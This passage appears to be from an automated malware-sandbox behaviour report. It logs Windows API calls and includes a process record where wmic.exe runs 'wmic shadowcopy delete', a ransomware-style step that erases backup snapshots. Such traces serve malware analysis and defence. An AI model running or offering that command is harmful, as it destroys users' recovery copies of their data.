HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3ba0 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3bc0 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3be0 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3c00 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3c20 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3c40 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3c60 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3c80 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3ca0 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3cc0 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3ce0 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3d00 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3d20 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3d40 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3d60 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3d80 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3da0 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3dc0 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3de0 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3e00 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3e20 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3e40 | out: hHeap=0x2d0000) returned 1 [0178.207] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3e60 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3e80 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3ea0 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3ec0 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3ee0 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3f00 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3f20 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3f40 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3f60 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3f80 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3fe0 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4000 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4020 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4040 | out: hHeap=0x2d0000) returned 1 [0178.208] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4060 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4080 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f40a0 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f40c0 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f40e0 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4100 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4120 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4140 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4160 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4180 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f41a0 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f41c0 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f41e0 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4200 | out: hHeap=0x2d0000) returned 1 [0178.209] GetProcessHeap () returned 0x2d0000 [0178.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4220 | out: hHeap=0x2d0000) returned 1 [0178.209] exit (_Code=0) Thread: id = 150 os_tid = 0x58c Thread: id = 151 os_tid = 0x188 Thread: id = 152 os_tid = 0x214 Thread: id = 153 os_tid = 0x258 Thread: id = 154 os_tid = 0x250 [0177.622] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x35fdc0 [0177.622] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3558a0 [0177.622] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x310580 [0177.622] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x360af0 [0177.622] LocalReAlloc (hMem=0x310580, uBytes=0x20, uFlags=0x2) returned 0x32f3d0 [0177.623] LocalFree (hMem=0x35fdc0) returned 0x0 [0177.623] LocalFree (hMem=0x360af0) returned 0x0 [0177.623] LocalFree (hMem=0x32f3d0) returned 0x0 [0177.623] LocalFree (hMem=0x3558a0) returned 0x0 Process: id = "24" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x3e29f000" os_pid = "0x218" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x698" cmd_line = "wmic shadowcopy delete" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 156 os_tid = 0x628 [0208.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fdd0 | out: lpSystemTimeAsFileTime=0x16fdd0*(dwLowDateTime=0x7f2899d0, dwHighDateTime=0x1d4f12b)) [0208.901] GetCurrentProcessId () returned 0x218 [0208.901] GetCurrentThreadId () returned 0x628 [0208.901] GetTickCount () returned 0x1d9ca [0208.901] QueryPerformanceCounter (in: lpPerformanceCount=0x16fdd8 | out: lpPerformanceCount=0x16fdd8*=17322662161) returned 1 [0208.901] GetModuleHandleW (lpModuleName=0x0) returned 0xff440000 [0208.901] __set_app_type (_Type=0x1) [0208.901] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff48ced0) returned 0x0 [0208.901] __wgetmainargs (in: _Argc=0xff4b2380, _Argv=0xff4b2390, _Env=0xff4b2388, _DoWildCard=0, _StartInfo=0xff4b239c | out: _Argc=0xff4b2380, _Argv=0xff4b2390, _Env=0xff4b2388) returned 0 [0208.903] ??0CHString@@QEAA@XZ () returned 0xff4b2ab0 [0208.904] malloc (_Size=0x30) returned 0x525a50 [0208.904] malloc (_Size=0x70) returned 0x525a90 [0208.904] malloc (_Size=0x50) returned 0x527ab0 [0208.904] malloc (_Size=0x30) returned 0x527b10 [0208.904] malloc (_Size=0x48) returned 0x527b50 [0208.904] malloc (_Size=0x30) returned 0x527ba0 [0208.904] malloc (_Size=0x30) returned 0x527be0 [0208.904] ??0CHString@@QEAA@XZ () returned 0xff4b2f58 [0208.904] malloc (_Size=0x30) returned 0x527c20 [0208.904] ?Empty@CHString@@QEAAXXZ () returned 0x7fef83e482c [0208.904] SetConsoleCtrlHandler (HandlerRoutine=0xff485724, Add=1) returned 1 [0208.904] _onexit (_Func=0xff49f378) returned 0xff49f378 [0208.904] _onexit (_Func=0xff49f490) returned 0xff49f490 [0208.905] _onexit (_Func=0xff49f4d0) returned 0xff49f4d0 [0208.905] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.905] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0209.106] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0209.116] CoCreateInstance (in: rclsid=0xff4473a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff447370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff4b2940 | out: ppv=0xff4b2940*=0x1d31390) returned 0x0 [0209.397] GetCurrentProcess () returned 0xffffffffffffffff [0209.397] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16fba0 | out: TokenHandle=0x16fba0*=0x104) returned 1 [0209.397] GetTokenInformation (in: TokenHandle=0x104, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16fb98 | out: TokenInformation=0x0, ReturnLength=0x16fb98) returned 0 [0209.397] malloc (_Size=0x118) returned 0x5263e0 [0209.397] GetTokenInformation (in: TokenHandle=0x104, TokenInformationClass=0x3, TokenInformation=0x5263e0, TokenInformationLength=0x118, ReturnLength=0x16fb98 | out: TokenInformation=0x5263e0, ReturnLength=0x16fb98) returned 1 [0209.397] AdjustTokenPrivileges (in: TokenHandle=0x104, DisableAllPrivileges=0, NewState=0x5263e0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-348430746, Attributes=0x6c2c), (Luid.LowPart=0x0, Luid.HighPart=5406608, Attributes=0x0), (Luid.LowPart=0x610072, Luid.HighPart=2097261, Attributes=0x690046), (Luid.LowPart=0x5c0073, Luid.HighPart=7274563, Attributes=0x6d006d), (Luid.LowPart=0x460020, Luid.HighPart=7077993, Attributes=0x730065), (Luid.LowPart=0x6d006f, Luid.HighPart=7274605, Attributes=0x50006e))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0209.398] free (_Block=0x5263e0) [0209.398] CloseHandle (hObject=0x104) returned 1 [0209.402] malloc (_Size=0x40) returned 0x5263e0 [0209.402] malloc (_Size=0x40) returned 0x526430 [0209.402] malloc (_Size=0x40) returned 0x526480 [0209.402] malloc (_Size=0x20a) returned 0x5264d0 [0209.402] GetSystemDirectoryW (in: lpBuffer=0x5264d0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0209.402] free (_Block=0x5264d0) [0209.402] malloc (_Size=0x18) returned 0x17dfb0 [0209.403] malloc (_Size=0x18) returned 0x527f90 [0209.403] malloc (_Size=0x18) returned 0x527fb0 [0209.403] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0209.403] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0209.403] free (_Block=0x17dfb0) [0209.403] free (_Block=0x527f90) [0209.403] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76b10000 [0209.403] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b26d40 [0209.403] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0209.403] FreeLibrary (hLibModule=0x76b10000) returned 1 [0209.403] free (_Block=0x527fb0) [0209.403] _vsnwprintf (in: _Buffer=0x526480, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x16f7c8 | out: _Buffer="ms_409") returned 6 [0209.404] malloc (_Size=0x20) returned 0x527f90 [0209.404] GetComputerNameW (in: lpBuffer=0x527f90, nSize=0x16fba0 | out: lpBuffer="XDUWTFONO", nSize=0x16fba0) returned 1 [0209.404] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.404] malloc (_Size=0x14) returned 0x17dfb0 [0209.404] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.404] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x16fb98 | out: lpNameBuffer=0x0, nSize=0x16fb98) returned 0x7fffffde000 [0209.405] GetLastError () returned 0xea [0209.405] malloc (_Size=0x40) returned 0x5264d0 [0209.405] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5264d0, nSize=0x16fb98 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16fb98) returned 0x1 [0209.405] lstrlenW (lpString="") returned 0 [0209.406] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0209.411] lstrlenW (lpString=".") returned 1 [0209.411] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0209.411] lstrlenW (lpString="LOCALHOST") returned 9 [0209.411] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0209.411] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.411] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0209.411] free (_Block=0x17dfb0) [0209.411] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.411] malloc (_Size=0x14) returned 0x17dfb0 [0209.411] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.411] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.411] malloc (_Size=0x14) returned 0x526520 [0209.411] lstrlenW (lpString="XDUWTFONO") returned 9 [0209.411] malloc (_Size=0x8) returned 0x526540 [0209.411] malloc (_Size=0x18) returned 0x526560 [0209.411] malloc (_Size=0x30) returned 0x526580 [0209.411] malloc (_Size=0x18) returned 0x5265c0 [0209.411] SysStringLen (param_1="IDENTIFY") returned 0x8 [0209.411] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0209.411] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0209.411] SysStringLen (param_1="IDENTIFY") returned 0x8 [0209.411] malloc (_Size=0x30) returned 0x5265e0 [0209.411] malloc (_Size=0x18) returned 0x526620 [0209.411] SysStringLen (param_1="IMPERSONATE") returned 0xb [0209.411] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0209.411] SysStringLen (param_1="IMPERSONATE") returned 0xb [0209.411] SysStringLen (param_1="IDENTIFY") returned 0x8 [0209.411] SysStringLen (param_1="IDENTIFY") returned 0x8 [0209.411] SysStringLen (param_1="IMPERSONATE") returned 0xb [0209.411] malloc (_Size=0x30) returned 0x526640 [0209.411] malloc (_Size=0x18) returned 0x526680 [0209.412] SysStringLen (param_1="DELEGATE") returned 0x8 [0209.412] SysStringLen (param_1="IDENTIFY") returned 0x8 [0209.412] SysStringLen (param_1="DELEGATE") returned 0x8 [0209.412] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0209.412] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0209.412] SysStringLen (param_1="DELEGATE") returned 0x8 [0209.412] malloc (_Size=0x30) returned 0x5266a0 [0209.412] malloc (_Size=0x18) returned 0x5266e0 [0209.412] malloc (_Size=0x30) returned 0x526700 [0209.412] malloc (_Size=0x18) returned 0x526740 [0209.412] SysStringLen (param_1="NONE") returned 0x4 [0209.412] SysStringLen (param_1="DEFAULT") returned 0x7 [0209.412] SysStringLen (param_1="DEFAULT") returned 0x7 [0209.412] SysStringLen (param_1="NONE") returned 0x4 [0209.412] malloc (_Size=0x30) returned 0x526760 [0209.412] malloc (_Size=0x18) returned 0x5267a0 [0209.412] SysStringLen (param_1="CONNECT") returned 0x7 [0209.412] SysStringLen (param_1="DEFAULT") returned 0x7 [0209.412] malloc (_Size=0x30) returned 0x5267c0 [0209.412] malloc (_Size=0x18) returned 0x526800 [0209.412] SysStringLen (param_1="CALL") returned 0x4 [0209.412] SysStringLen (param_1="DEFAULT") returned 0x7 [0209.412] SysStringLen (param_1="CALL") returned 0x4 [0209.412] SysStringLen (param_1="CONNECT") returned 0x7 [0209.412] malloc (_Size=0x30) returned 0x526820 [0209.412] malloc (_Size=0x18) returned 0x526860 [0209.412] SysStringLen (param_1="PKT") returned 0x3 [0209.412] SysStringLen (param_1="DEFAULT") returned 0x7 [0209.412] SysStringLen (param_1="PKT") returned 0x3 [0209.412] SysStringLen (param_1="NONE") returned 0x4 [0209.412] SysStringLen (param_1="NONE") returned 0x4 [0209.412] SysStringLen (param_1="PKT") returned 0x3 [0209.412] malloc (_Size=0x30) returned 0x526880 [0209.412] malloc (_Size=0x18) returned 0x5268c0 [0209.413] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0209.413] SysStringLen (param_1="DEFAULT") returned 0x7 [0209.413] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0209.413] SysStringLen (param_1="NONE") returned 0x4 [0209.413] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0209.413] SysStringLen (param_1="PKT") returned 0x3 [0209.413] SysStringLen (param_1="PKT") returned 0x3 [0209.413] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0209.413] malloc (_Size=0x30) returned 0x528000 [0209.413] malloc (_Size=0x18) returned 0x526ce0 [0209.413] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0209.413] SysStringLen (param_1="DEFAULT") returned 0x7 [0209.413] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0209.413] SysStringLen (param_1="PKT") returned 0x3 [0209.413] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0209.413] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0209.413] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0209.413] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0209.413] malloc (_Size=0x30) returned 0x528040 [0209.413] malloc (_Size=0x40) returned 0x526d00 [0209.413] malloc (_Size=0x20a) returned 0x528fd0 [0209.413] GetSystemDirectoryW (in: lpBuffer=0x528fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0209.413] free (_Block=0x528fd0) [0209.413] malloc (_Size=0x18) returned 0x526d50 [0209.413] malloc (_Size=0x18) returned 0x526d70 [0209.413] malloc (_Size=0x18) returned 0x526d90 [0209.413] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0209.413] SysStringLen (param_1="\\wbem\\") returned 0x6 [0209.413] free (_Block=0x526d50) [0209.413] free (_Block=0x526d70) [0209.414] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0209.414] free (_Block=0x526d90) [0209.414] malloc (_Size=0x18) returned 0x526d50 [0209.414] malloc (_Size=0x18) returned 0x526d70 [0209.414] malloc (_Size=0x18) returned 0x526d90 [0209.414] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0209.414] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0209.414] free (_Block=0x526d50) [0209.414] free (_Block=0x526d70) [0209.414] GetCurrentThreadId () returned 0x628 [0209.414] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x16f4a0 | out: phkResult=0x16f4a0*=0x108) returned 0x0 [0209.414] RegQueryValueExW (in: hKey=0x108, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x16f4f0, lpcbData=0x16f490*=0x400 | out: lpType=0x0, lpData=0x16f4f0*=0x30, lpcbData=0x16f490*=0x4) returned 0x0 [0209.414] _wcsicmp (_String1="0", _String2="1") returned -1 [0209.414] _wcsicmp (_String1="0", _String2="2") returned -2 [0209.414] RegQueryValueExW (in: hKey=0x108, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x16f490*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x16f490*=0x42) returned 0x0 [0209.414] malloc (_Size=0x86) returned 0x526db0 [0209.414] RegQueryValueExW (in: hKey=0x108, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x526db0, lpcbData=0x16f490*=0x42 | out: lpType=0x0, lpData=0x526db0*=0x25, lpcbData=0x16f490*=0x42) returned 0x0 [0209.414] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0209.414] malloc (_Size=0x42) returned 0x526e40 [0209.414] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0209.414] RegQueryValueExW (in: hKey=0x108, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x16f4f0, lpcbData=0x16f490*=0x400 | out: lpType=0x0, lpData=0x16f4f0*=0x36, lpcbData=0x16f490*=0xc) returned 0x0 [0209.414] _wtol (_String="65536") returned 65536 [0209.414] free (_Block=0x526db0) [0209.414] RegCloseKey (hKey=0x0) returned 0x6 [0209.414] CoCreateInstance (in: rclsid=0xff447410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4473f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f998 | out: ppv=0x16f998*=0x21971d0) returned 0x0 [0209.641] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21971d0, xmlSource=0x16fae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x526d50), isSuccessful=0x16fb50 | out: isSuccessful=0x16fb50*=0xffff) returned 0x0 [0211.208] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21971d0, DOMElement=0x16f990 | out: DOMElement=0x16f990*=0x219bc50) returned 0x0 [0211.209] malloc (_Size=0x18) returned 0x526d50 [0211.209] IXMLDOMElement:getElementsByTagName (in: This=0x219bc50, tagName="XSLFORMAT", resultList=0x16f9a0 | out: resultList=0x16f9a0*=0x2199cc0) returned 0x0 [0211.210] free (_Block=0x526d50) [0211.210] IXMLDOMNodeList:get_length (in: This=0x2199cc0, listLength=0x16fb68 | out: listLength=0x16fb68*=21) returned 0x0 [0211.210] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=0, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.211] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: 